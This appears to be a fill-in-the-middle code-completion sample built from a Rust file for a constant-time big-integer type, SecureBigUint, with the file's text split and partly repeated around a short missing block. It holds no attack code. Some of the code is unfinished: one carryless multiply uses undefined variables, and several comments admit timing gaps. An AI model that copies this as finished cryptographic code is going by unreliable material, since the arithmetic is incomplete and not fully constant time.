let v = (self.value[i] as u64) + (rhs.value[i] as u64) + carry;
self.value[i] = v as u32;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
fn sub(&self, rhs: &Self) -> Self {
let mut out = self.clone();
out.sub_assign(rhs);
out
}
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
fn sub_assign(&mut self, rhs: &Self) {
assert!(!self.overflowing_sub_assign(rhs));
}
fn mul(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, self.bit_width() + rhs.bit_width());
self.mul_to(rhs, &mut out);
out
}
/// O(n^2) multiplication. Assumes that u64*u64 multiplication is always
/// constant time.
///
/// 'out' must be twice the size of
fn mul_to(&self, rhs: &Self, out: &mut Self) {
out.assign_zero();
let mut overflowed = false;
for i in 0..self.value.len() {
let mut carry = 0;
for j in 0..rhs.value.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((self.value[i] as u64) * (rhs.value[j] as u64))
+ (out.value[i + j] as u64)
+ carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as BaseType;
}
// assert!(carry <= u32::max_value() as u64);
if i + rhs.value.len() < out.value.len() {
out.value[i + rhs.value.len()] = carry as BaseType;
} else {
overflowed |= carry != 0;
}
}
assert!(!overflowed);
}
fn bit(&self, i: usize) -> usize {
((self.value[i / BASE_BITS] >> (i % BASE_BITS)) & 0b01) as usize
}
fn set_bit(&mut self, i: usize, v: usize) {
assert!(v == 0 || v == 1);
let ii = i / BASE_BITS;
let shift = i % BASE_BITS;
let mask = !(1 << shift);
self.value[ii] = (self.value[ii] & mask) | ((v as BaseType) << shift);
}
/// Computes the quotient and remainder of 'self / rhs'.
///
/// Any mixture of input bit_widths is supported.
/// Internally this uses binary long division.
///
/// NOTE: This is very slow and should be avoided if possible.
///
/// Returns a tuple of '(self / rhs, self % rhs)' where the quotient is the
/// same width as 'self' and the remainder is the same width as 'rhs'.
fn quorem(&self, rhs: &Self) -> (Self, Self) {
let mut q = Self::from_usize(0, self.bit_width()); // Range is [0, Self]
let mut r = Self::from_usize(0, rhs.bit_width()); // Range is [0, rhs).
// TODO: Implement a bit iterator so set_bit requires less work.
for i in (0..self.bit_width()).rev() {
let carry = r.shl();
r.set_bit(0, self.bit(i));
let mut next_r = Self::from_usize(0, rhs.bit_width());
// If there is a carry, then we know that r might be > rhs when the shl also has
// a carry.
let carry2 = r.overflowing_sub_to(rhs, &mut next_r);
let subtract = (carry != 0) == carry2;
next_r.copy_if(subtract, &mut r);
q.set_bit(i, if subtract { 1 } else { 0 });
}
(q, r)
}
fn value_bits(&self) -> usize {
for i in (0..self.value.len()).rev() {
let zeros = self.value[i].leading_zeros() as usize;
if zeros == BASE_BITS {
continue;
}
return (i * BASE_BITS) + (BASE_BITS - zeros);
}
0
}
fn bit_width(&self) -> usize {
self.value.len() * BASE_BITS
}
}
impl SecureBigUint {
pub fn byte_width(&self) -> usize {
self.value.len() * BASE_BYTES
}
/// Multiplies two numbers and adds their result to the out number.
/// out += self*rhs
pub(super) fn add_mul_to(&self, rhs: &Self, out: &mut Self) {
let a = &self.value[..];
let b = &rhs.value[..];
for i in 0..a.len() {
let mut carry = 0;
for j in 0..b.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((a[i] as u64) * (b[j] as u64)) + (out.value[i + j] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as u32;
}
for k in (i + b.len())..out.value.len() {
let tmp = (out.value[k] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[k] = tmp as u32;
}
}
}
/// Copies 'self' to 'out' if should_copy is true. In all cases, this takes
/// a constant amount of time to execute.
///
/// NOTE: 'self' and 'out' must have the same bit_width().
#[inline(never)]
pub fn copy_if(&self, should_copy: bool, out: &mut Self) {
assert_eq!(self.value.len(), out.value.len());
// Will be 0b111...111 if should_copy else 0.
let self_mask = (!(should_copy as BaseType)).wrapping_add(1);
let out_mask = !self_mask;
for (self_v, out_v) in self.value.iter().zip(out.value.iter_mut()) {
*out_v = (*self_v & self_mask).wrapping_add(*out_v & out_mask);
}
}
/// Swaps the contents of 'self' and 'other' if 'should_swap' is true.
///
/// The actual values of both integers are swapped rather than swapping any
/// internal memory pointers so that 'should_swap' can not be inferred from
/// the memory locations of the final integers.
///
/// At a given integer bit_width, this should always take the same amount of
/// CPU cycles to execute.
#[inline(never)]
pub fn swap_if(&mut self, other: &mut Self, should_swap: bool) {
assert_eq!(self.value.len(), other.value.len());
// Will be 0b111...111 if should_swap else 0.
let mask = (!(should_swap as BaseType)).wrapping_add(1);
for (self_v, other_v) in self.value.iter_mut().zip(other.value.iter_mut()) {
// Will be 0 if we don't want to swap.
let filter = mask & (*self_v ^ *other_v);
*self_v ^= filter;
*other_v ^= filter;
}
}
/// In-place reverses all the order of all bits in this integer.
pub fn reverse_bits(&mut self) {
let mid = (self.value.len() + 1) / 2;
for i in 0..mid {
let j = self.value.len() - 1 - i;
// Swap if we are not at the middle limb (only relevant if we have an odd number
// of limbs).
if i != j {
self.value.swap(i, j);
self.value[j] = self.value[j].reverse_bits();
}
self.value[i] = self.value[i].reverse_bits();
}
}
/// Performs 'self ^= rhs' only if 'should_apply' is true.
pub fn xor_assign_if(&mut self, should_apply: bool, rhs: &Self) {
assert_eq!(self.value.len(), rhs.value.len());
// Will be 0b111...111 if should_apply else 0.
let mask = (!(should_apply as BaseType)).wrapping_add(1);
for i in 0..self.value.len() {
self.value[i] ^= rhs.value[i] & mask;
}
}
pub fn discard(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
self.value.truncate(n);
}
///
pub fn truncate(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
// TODO: Also zero out any high bits
for i in n..self.value.len() {
assert_eq!(self.value[i], 0);
}
self.value.truncate(n);
}
/// Computes 2^n more efficiently than using pow().
/// Only supports exponents smaller than u32.
/// TODO: Just take as input a u32 directly.
pub fn exp2(n: u32, bit_width: usize) -> Self {
let mut out = Self::from_usize(0, bit_width);
out.set_bit(n as usize, 1);
out
}
pub fn is_zero(&self) -> bool {
let mut is = true;
for v in &self.value {
is &= *v == 0;
}
is
}
/// TODO: Improve the constant time behavior of this.
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
pub(super) fn overflowing_sub_assign(&mut self, rhs: &Self) -> bool {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
// rhs is allowed to be narrower than self
let r_i = if i < rhs.value.len() { rhs.value[i] } else { 0 };
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (self.value[i] as i64) - (r_i as i64) + carry;
if v < 0 {
self.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
self.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
pub(super) fn overflowing_sub_to(&self, rhs: &Self, out: &mut Self) -> bool {
let mut carry = 0;
let n = out.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (a as i64) - (b as i64) + carry;
if v < 0 {
out.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
out.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
/// Performs modular reduction using up to one subtraction of the modulus
/// from the value.
///
/// Will panic if 'self' was >= 2*modulus
pub fn reduce_once(&mut self, modulus: &Self) {
let mut reduced = Self::from_usize(0, self.bit_width());
let overflow = self.overflowing_sub_to(modulus, &mut reduced);
reduced.copy_if(!overflow, self);
self.truncate(modulus.bit_width());
}
#[must_use]
pub fn shl(&mut self) -> BaseType {
let mut carry = 0;
for v in self.value.iter_mut() {
let (new_v, _) = v.overflowing_shl(1);
let new_carry = *v >> 31;
*v = new_v | carry;
carry = new_carry;
}
carry
}
pub fn shr(&mut self) {
let mut carry = 0;
for v in self.value.iter_mut().rev() {
let (new_v, _) = v.overflowing_shr(1);
let new_carry = *v & 1;
*v = new_v | (carry << 31);
carry = new_carry;
}
}
/// Computes 'self >>= n'
/// NOTE: We assume that 'n' is a publicly known constant.
pub fn shr_n(&mut self, n: usize) {
let byte_shift = n / BASE_BITS;
let carry_size = n % BASE_BITS;
let carry_mask = ((1 as BaseType) << carry_size).wrapping_sub(1);
for i in 0..self.value.len() {
let v = self.value[i];
self.value[i] = 0;
if i < byte_shift {
continue;
}
let j = i - byte_shift;
self.value[j] = v >> carry_size;
if carry_size != 0 && j > 0 {
let carry = v & carry_mask;
self.value[j - 1] |= carry << (BASE_BITS - carry_size);
}
}
}
/// Computes self >>= BASE_BITS.
pub(super) fn shr_base(&mut self) {
assert_eq!(self.value[0], 0);
for j in 1..self.value.len() {
self.value[j - 1] = self.value[j];
}
let k = self.value.len();
self.value[k - 1] = 0;
}
pub fn and_assign(&mut self, rhs: &Self) {
for i in 0..self.value.len() {
self.value[i] &= rhs.value[i];
}
}
/// Efficienctly (in O(1) time) computes 'self % 2^32'
pub fn mod_word(&self) -> u32 {
if self.value.len() == 0 {
0
} else {
self.value[0]
}
}
// TODO: Need a version of this using pmull in aarch64 (vmull_p64)
/// Interprates this integer and 'rhs' as polynomials over GF(2^n) and
/// multiplies them into 'out'.
///
/// Operations in this field:
/// - Addition is XOR
/// - Multiplication is AND
#[cfg(all(target_arch = "x86_64", target_feature = "pclmulqdq"))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
use crate::intrinsics::*;
use core::arch::x86_64::_mm_clmulepi64_si128;
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..self.value.len() {
let a = u64_to_m128i(self.value[i] as u64);
for j in 0..rhs.value.len() {
let b = u64_to_m128i(rhs.value[j] as u64);
let r = u64_from_m128i(unsafe { _mm_clmulepi64_si128(a, b, 0) });
let rl = r as u32;
let rh = (r >> 32) as u32;
// Add to output
out.value[i + j] ^= rl;
out.value[i + j + 1] ^= rh;
}
}
}
// TODO: Finish making this constant time and correct.
#[cfg(not(all(target_arch = "x86_64", target_feature = "pclmulqdq")))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..b.value_bits() {
out.xor_assign_if(b.bit(i) == 1, &a);
a.shl();
}
}
// TODO: Move to a shared utility.
pub fn to_string_radix(&self, radix: u32) -> alloc::string::String {
// TODO: These should be global constants (as well as one)
let zero = Self::from_usize(0, self.bit_width());
let div = Self::from_usize(radix as usize, 32);
let mut s = alloc::string::String::new();
let mut tmp = self.clone();
while tmp > zero {
// TODO: We can divide by a larger power of 10 to make this more efficient.
let (q, r) = tmp.quorem(&div);
tmp = q;
// TODO: Very inefficient
s.insert(
0,
core::char::from_digit(r.value.first().cloned().unwrap_or(0), radix).unwrap(),
);
}
if s.len() == 0 {
s.push('0');
}
s
}
/// Resets the value of the integer to 0.
pub fn assign_zero(&mut self) {
for v in self.value.iter_mut() {
*v = 0;
}
}
/// In-place increases the size
pub fn extend(&mut self, bit_width: usize) {
let new_len = ceil_div(bit_width, BASE_BITS);
assert!(new_len >= self.value.len());
self.value.resize(new_len, 0);
}
pub fn from_str(s: &str, bit_width: usize) -> common::errors::Result<Self> {
let ten = SecureBigUint::from_usize(10, 32);
let mut out = Self::from_usize(0, bit_width);
for c in s.chars() {
let digit = c
.to_digit(10)
.ok_or(common::errors::err_msg("Invalid digit"))?;
let tmp = out.clone();
ten.mul_to(&tmp, &mut out);
out += SecureBigUint::from_usize(digit as usize, bit_width);
// out = (&out * &ten) + &(digit as usize).into();
}
Ok(out)
}
}
impl core::fmt::Display for SecureBigUint {
fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result {
write!(f, "{}", self.to_string_radix(10))
}
}
impl Ord for SecureBigUint {
fn cmp(&self, other: &Self) -> Ordering {
let mut less = 0;
let mut greater = 0;
let n = core::cmp::max(self.value.len(), other.value.len());
for i in (0..n).rev() {
let mask = !(less | greater);
let a = self.value.get(i).cloned().unwrap_or(0);
let b = other.value.get(i).cloned().unwrap_or(0);
if a < b {
less |= mask & 1;
} else if a > b {
greater |= mask & 1;
}
}
let cmp = (less << 1) | greater;
let mut out = Ordering::Equal;
// Exactly one of these if statements should always be triggered.
if cmp == 0b10 {
out = Ordering::Less;
}
if cmp == 0b01 {
out = Ordering::Greater;
}
if cmp == 0b00 |
out
}
}
impl PartialEq for SecureBigUint {
fn eq(&self, other: &Self) -> bool {
self.cmp(other) == Ordering::Equal
}
}
impl Eq for SecureBigUint {}
impl PartialOrd for SecureBigUint {
fn partial_cmp(&self, other: &Self) -> Option<Ordering> {
Some(self.cmp(other))
}
}
impl_op_ex!(+= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::add_assign(lhs, rhs)
});
impl_op_commutative!(+ |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
// NOTE: Does not use add_into to avoid risking an overflow.
Integer::add(&lhs, rhs)
});
impl_op!(+ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
Integer::add(lhs, rhs)
});
impl_op_ex!(-= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::sub_assign(lhs, rhs)
});
impl_op_ex!(-|lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { lhs.sub_into(rhs) });
impl_op!(-|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::sub(lhs, rhs) });
impl_op_ex!(
*|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::mul(lhs, rhs) }
);
impl_op_ex!(/ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (q, _) = lhs.quorem(rhs);
q
});
impl_op!(% |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op!(% |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op_ex!(^= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
assert_eq!(lhs.value.len(), rhs.value.len());
for (lhs_value, rhs_value) in lhs.value.iter_mut().zip(rhs.value.iter()) {
*lhs_value ^= *rhs_value;
}
});
impl_op_ex!(^ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
assert_eq!(lhs.value.len(), rhs.value.len());
let mut out = SecureBigUint::from_usize(0, lhs.bit_width());
for i in 0..out.value.len() {
out.value[i] = lhs.value[i] ^ rhs.value[i];
}
out
});
#[cfg(test)]
mod tests {
use super::*;
use core::str::FromStr;
#[test]
fn secure_biguint_test() {
// TODO: Check multiplication in x*0 and x*1 cases
let seven = SecureBigUint::from_usize(7, 64);
let one_hundred = SecureBigUint::from_usize(100, 64);
assert!(one_hundred > seven);
assert!(seven < one_hundred);
assert!(one_hundred == one_hundred);
assert!(seven == seven);
let mut seven_hundred = SecureBigUint::from_usize(0, 64);
seven.mul_to(&one_hundred, &mut seven_hundred);
assert!(seven_hundred == SecureBigUint::from_usize(700, 64));
let x = SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff]);
let mut temp = SecureBigUint::from_usize(0, 64);
x.mul_to(&x, &mut temp);
assert_eq!(
&temp.to_le_bytes(),
&(core::u32::MAX as u64).pow(2).to_le_bytes()
);
let (q, r) = temp.quorem(&x);
// Equal to 'x' extended to 64 bits
assert!(q == SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff, 0, 0, 0, 0]));
assert!(r == SecureBigUint::from_usize(0, 32));
let (q, r) = one_hundred.quorem(&seven);
assert!(q == SecureBigUint::from_usize(14, 64));
assert!(r == SecureBigUint::from_usize(2, 64));
let (q, r) = seven.quorem(&one_hundred);
assert!(q == SecureBigUint::from_usize(0, 64));
assert!(r == SecureBigUint::from_usize(7, 64));
// TODO: Test larger numbers.
}
#[test]
fn shr_n_test() {
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0b00001010, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(8);
assert_eq!(&v.to_be_bytes(), &[0, 0b00010100, 0, 0]);
}
// Testing moving values across bases.
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(32);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00010100, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(34);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00000101, 0, 0, 0]);
}
// Carry to second base.
{
let mut v = SecureBigUint::from_be_bytes(&[0, 0, 0, 1, 0, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b10000000, 0, 0, 0]);
}
}
}
| {
out = Ordering::Equal;
} | conditional_block |
uint.rs | use alloc::vec::Vec;
use common::ceil_div;
use core::cmp::Ord;
use core::cmp::Ordering;
use core::marker::PhantomData;
use core::ops;
use core::ops::Div;
use core::ops::Index;
use core::ops::IndexMut;
use generic_array::{arr::AddLength, ArrayLength, GenericArray};
use typenum::Quot;
use typenum::{Prod, U32};
use crate::integer::Integer;
use crate::matrix::dimension::*;
use crate::number::{One, Zero};
/*
pub trait StorageType<D: Dimension>:
Clone + AsRef<[u32]> + AsMut<[u32]> + Index<usize, Output = u32> + IndexMut<usize, Output = u32>
{
/// Allocates a new buffer with at least 'words' number of items.
fn alloc(words: usize) -> Self;
}
impl StorageType<Dynamic> for Vec<u32> {
fn alloc(words: usize) -> Self {
vec![0; words]
}
}
*/
pub(super) type BaseType = u32;
pub(super) const BASE_BITS: usize = 32;
const BASE_BYTES: usize = core::mem::size_of::<BaseType>();
const BITS_PER_BYTE: usize = 8;
/// Big unsigned integer implementation intended for security critical
/// use-cases.
///
/// Internally each instance stores a fixed size storage buffer based on the bit
/// width used to initialize the integer. All numerical operations are constant
/// time for a given storage buffer size unless otherwise specified. This means
/// that we assume that the buffer widths are publicly known and don't vary with
/// the value of the integer.
///
/// Special care must be taken to ensure that the width of integers generated by
/// operations is kept under control:
/// - Addition (a + b) will output integers with space for one extra carry bit.
/// - Multiplication (a*b) will output integers with double the space.
/// - Operations like quorem (a % b) or truncate can be used to re-contrain the
/// width of integers.
#[derive(Clone, Debug)]
pub struct SecureBigUint {
/// In little endian 32bits at a time.
/// Will be padded with
///
/// TODO: We can make this an enum to support passing in '&mut [BaseType]'
pub(super) value: Vec<BaseType>,
}
impl SecureBigUint {
/// Creates an integer from a small value that fits within a usize. The
/// buffer used to store this number will be able to store at least 'width'
/// bits.
pub fn from_usize(value: usize, width: usize) -> Self {
let mut data = vec![0; ceil_div(width, BASE_BITS)];
data[0] = value as BaseType;
Self { value: data }
}
}
impl Integer for SecureBigUint {
/// Creates an integer from little endian bytes representing the number.
///
/// The width of the integer is inferred from data.len().
/// The caller is responsible for ensuring that data.len() is a well known
/// constant.
fn from_le_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_le_bytes(*array_ref![data, BASE_BYTES * i, BASE_BYTES]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[0..rem].copy_from_slice(&data[(data.len() - rem)..]);
out.value[n] = BaseType::from_le_bytes(rest);
}
out
}
/// Converts the integer to little endian bytes.
///
/// NOTE: This may have zero significant padding depending on the internal
/// representation.
fn to_le_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * BASE_BYTES);
for v in &self.value {
data.extend_from_slice(&v.to_le_bytes());
}
data
}
fn from_be_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_be_bytes(*array_ref![
data,
data.len() - (BASE_BYTES * (i + 1)),
BASE_BYTES
]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[(BASE_BYTES - rem)..].copy_from_slice(&data[0..rem]);
out.value[n] = BaseType::from_be_bytes(rest);
}
out
}
fn to_be_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * 4);
for v in self.value.iter().rev() {
data.extend_from_slice(&v.to_be_bytes());
}
data
}
/// Computes and returns 'self + rhs'. The output buffer will be 1 bit
/// larger than the inputs to accomadate possible overflow.
fn add(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, core::cmp::max(self.bit_width(), rhs.bit_width()) + 1);
self.add_to(rhs, &mut out);
out
}
/// Computes 'output = self + rhs'. It is the user's responsibility to
/// ensure that the
fn add_to(&self, rhs: &Self, output: &mut Self) {
assert!(output.value.len() >= self.value.len());
assert!(output.value.len() >= rhs.value.len());
let mut carry = 0;
// TODO: Always loop through max(self, rhs, output) length so we know for sure
// that all carries are handled.
let n = output.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
let v = (a as u64) + (b as u64) + carry;
output.value[i] = v as BaseType;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
/// Computes 'self += rhs'.
fn add_assign(&mut self, rhs: &Self) {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
let v = (self.value[i] as u64) + (rhs.value[i] as u64) + carry;
self.value[i] = v as u32;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
fn sub(&self, rhs: &Self) -> Self {
let mut out = self.clone();
out.sub_assign(rhs);
out
}
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
fn sub_assign(&mut self, rhs: &Self) {
assert!(!self.overflowing_sub_assign(rhs));
}
fn mul(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, self.bit_width() + rhs.bit_width());
self.mul_to(rhs, &mut out);
out
}
/// O(n^2) multiplication. Assumes that u64*u64 multiplication is always
/// constant time.
///
/// 'out' must be twice the size of
fn mul_to(&self, rhs: &Self, out: &mut Self) {
out.assign_zero();
let mut overflowed = false;
for i in 0..self.value.len() {
let mut carry = 0;
for j in 0..rhs.value.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((self.value[i] as u64) * (rhs.value[j] as u64))
+ (out.value[i + j] as u64)
+ carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as BaseType;
}
// assert!(carry <= u32::max_value() as u64);
if i + rhs.value.len() < out.value.len() {
out.value[i + rhs.value.len()] = carry as BaseType;
} else {
overflowed |= carry != 0;
}
}
assert!(!overflowed);
}
fn bit(&self, i: usize) -> usize {
((self.value[i / BASE_BITS] >> (i % BASE_BITS)) & 0b01) as usize
}
fn set_bit(&mut self, i: usize, v: usize) {
assert!(v == 0 || v == 1);
let ii = i / BASE_BITS;
let shift = i % BASE_BITS;
let mask = !(1 << shift);
self.value[ii] = (self.value[ii] & mask) | ((v as BaseType) << shift);
}
/// Computes the quotient and remainder of 'self / rhs'.
///
/// Any mixture of input bit_widths is supported.
/// Internally this uses binary long division.
///
/// NOTE: This is very slow and should be avoided if possible.
///
/// Returns a tuple of '(self / rhs, self % rhs)' where the quotient is the
/// same width as 'self' and the remainder is the same width as 'rhs'.
fn quorem(&self, rhs: &Self) -> (Self, Self) {
let mut q = Self::from_usize(0, self.bit_width()); // Range is [0, Self]
let mut r = Self::from_usize(0, rhs.bit_width()); // Range is [0, rhs).
// TODO: Implement a bit iterator so set_bit requires less work.
for i in (0..self.bit_width()).rev() {
let carry = r.shl();
r.set_bit(0, self.bit(i));
let mut next_r = Self::from_usize(0, rhs.bit_width());
// If there is a carry, then we know that r might be > rhs when the shl also has
// a carry.
let carry2 = r.overflowing_sub_to(rhs, &mut next_r);
let subtract = (carry != 0) == carry2;
next_r.copy_if(subtract, &mut r);
q.set_bit(i, if subtract { 1 } else { 0 });
}
(q, r)
}
fn value_bits(&self) -> usize {
for i in (0..self.value.len()).rev() {
let zeros = self.value[i].leading_zeros() as usize;
if zeros == BASE_BITS {
continue;
}
return (i * BASE_BITS) + (BASE_BITS - zeros);
}
0
}
fn bit_width(&self) -> usize {
self.value.len() * BASE_BITS
}
}
impl SecureBigUint {
pub fn byte_width(&self) -> usize {
self.value.len() * BASE_BYTES
}
/// Multiplies two numbers and adds their result to the out number.
/// out += self*rhs
pub(super) fn add_mul_to(&self, rhs: &Self, out: &mut Self) {
let a = &self.value[..];
let b = &rhs.value[..];
for i in 0..a.len() {
let mut carry = 0;
for j in 0..b.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((a[i] as u64) * (b[j] as u64)) + (out.value[i + j] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as u32;
}
for k in (i + b.len())..out.value.len() {
let tmp = (out.value[k] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[k] = tmp as u32;
}
}
}
/// Copies 'self' to 'out' if should_copy is true. In all cases, this takes
/// a constant amount of time to execute.
///
/// NOTE: 'self' and 'out' must have the same bit_width().
#[inline(never)]
pub fn copy_if(&self, should_copy: bool, out: &mut Self) {
assert_eq!(self.value.len(), out.value.len());
// Will be 0b111...111 if should_copy else 0.
let self_mask = (!(should_copy as BaseType)).wrapping_add(1);
let out_mask = !self_mask;
for (self_v, out_v) in self.value.iter().zip(out.value.iter_mut()) {
*out_v = (*self_v & self_mask).wrapping_add(*out_v & out_mask);
}
}
/// Swaps the contents of 'self' and 'other' if 'should_swap' is true.
///
/// The actual values of both integers are swapped rather than swapping any
/// internal memory pointers so that 'should_swap' can not be inferred from
/// the memory locations of the final integers.
///
/// At a given integer bit_width, this should always take the same amount of
/// CPU cycles to execute.
#[inline(never)]
pub fn swap_if(&mut self, other: &mut Self, should_swap: bool) {
assert_eq!(self.value.len(), other.value.len());
// Will be 0b111...111 if should_swap else 0.
let mask = (!(should_swap as BaseType)).wrapping_add(1);
for (self_v, other_v) in self.value.iter_mut().zip(other.value.iter_mut()) {
// Will be 0 if we don't want to swap.
let filter = mask & (*self_v ^ *other_v);
*self_v ^= filter;
*other_v ^= filter;
}
}
/// In-place reverses all the order of all bits in this integer.
pub fn reverse_bits(&mut self) {
let mid = (self.value.len() + 1) / 2;
for i in 0..mid {
let j = self.value.len() - 1 - i;
// Swap if we are not at the middle limb (only relevant if we have an odd number
// of limbs).
if i != j {
self.value.swap(i, j);
self.value[j] = self.value[j].reverse_bits();
}
self.value[i] = self.value[i].reverse_bits();
}
}
/// Performs 'self ^= rhs' only if 'should_apply' is true.
pub fn xor_assign_if(&mut self, should_apply: bool, rhs: &Self) {
assert_eq!(self.value.len(), rhs.value.len());
// Will be 0b111...111 if should_apply else 0.
let mask = (!(should_apply as BaseType)).wrapping_add(1);
for i in 0..self.value.len() {
self.value[i] ^= rhs.value[i] & mask;
}
}
pub fn discard(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
self.value.truncate(n);
}
///
pub fn truncate(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
// TODO: Also zero out any high bits
for i in n..self.value.len() {
assert_eq!(self.value[i], 0);
}
self.value.truncate(n);
}
/// Computes 2^n more efficiently than using pow().
/// Only supports exponents smaller than u32.
/// TODO: Just take as input a u32 directly.
pub fn exp2(n: u32, bit_width: usize) -> Self {
let mut out = Self::from_usize(0, bit_width);
out.set_bit(n as usize, 1);
out
}
pub fn is_zero(&self) -> bool {
let mut is = true;
for v in &self.value {
is &= *v == 0;
}
is
}
/// TODO: Improve the constant time behavior of this.
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
pub(super) fn overflowing_sub_assign(&mut self, rhs: &Self) -> bool {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
// rhs is allowed to be narrower than self
let r_i = if i < rhs.value.len() { rhs.value[i] } else { 0 };
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (self.value[i] as i64) - (r_i as i64) + carry;
if v < 0 {
self.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
self.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
pub(super) fn overflowing_sub_to(&self, rhs: &Self, out: &mut Self) -> bool {
let mut carry = 0;
let n = out.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (a as i64) - (b as i64) + carry;
if v < 0 {
out.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
out.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
/// Performs modular reduction using up to one subtraction of the modulus
/// from the value.
///
/// Will panic if 'self' was >= 2*modulus
pub fn reduce_once(&mut self, modulus: &Self) {
let mut reduced = Self::from_usize(0, self.bit_width());
let overflow = self.overflowing_sub_to(modulus, &mut reduced);
reduced.copy_if(!overflow, self);
self.truncate(modulus.bit_width());
}
#[must_use]
pub fn shl(&mut self) -> BaseType {
let mut carry = 0;
for v in self.value.iter_mut() {
let (new_v, _) = v.overflowing_shl(1);
let new_carry = *v >> 31;
*v = new_v | carry;
carry = new_carry;
}
carry
}
pub fn shr(&mut self) {
let mut carry = 0;
